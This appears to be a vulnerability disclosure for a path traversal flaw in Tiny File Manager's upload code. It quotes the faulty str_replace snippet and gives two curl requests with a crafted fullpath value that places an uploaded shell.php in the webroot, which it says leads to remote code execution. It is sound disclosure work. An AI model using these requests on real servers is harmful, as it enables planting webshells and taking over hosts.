A Path Traversal vulnerability exists in Tiny File Manager, which allows the upload of files to an arbitrary location in the server. This flaw derives from the way that the file upload/creation is handled when a file with the same name already exists in the target directory.
// tinyfilemanager.php
// ... snippet ...
if(file_exists ($fullPath) && !$override_file_name) {
$ext_1 = $ext ? '.'.$ext : '';
$fullPath = str_replace($ext_1, '', $fullPath) .'_'. date('ymdHis'). $ext_1;
}
// ... snippet ...
If we look at how str_replace
is used to separate the old filename from its extension, we can see that it will in fact remove all occurrences of the extension from the whole fullpath parameter. Therefore, if an attacker sends, for example, two consecutive requests with fullpath ...php/...php/...php/...php/...php/var/www/html/benign.php
and filename shell.php
, it will move the uploaded file to ../../../../../var/www/html/benign_<DATE>.php
.
curl -s -H 'Cookie: filemanager=<SESSIONID>' -F'[email protected]' -F'fullpath=...php/...php/...php/...php/...php/var/www/html/benign.php' <HOST>
curl -s -H 'Cookie: filemanager=<SESSIONID>' -F'[email protected]' -F'fullpath=...php/...php/...php/...php/...php/var/www/html/benign.php' <HOST>
By leveraging this vulnerability to upload a webshell, it’s possible to achieve RCE in the server/container.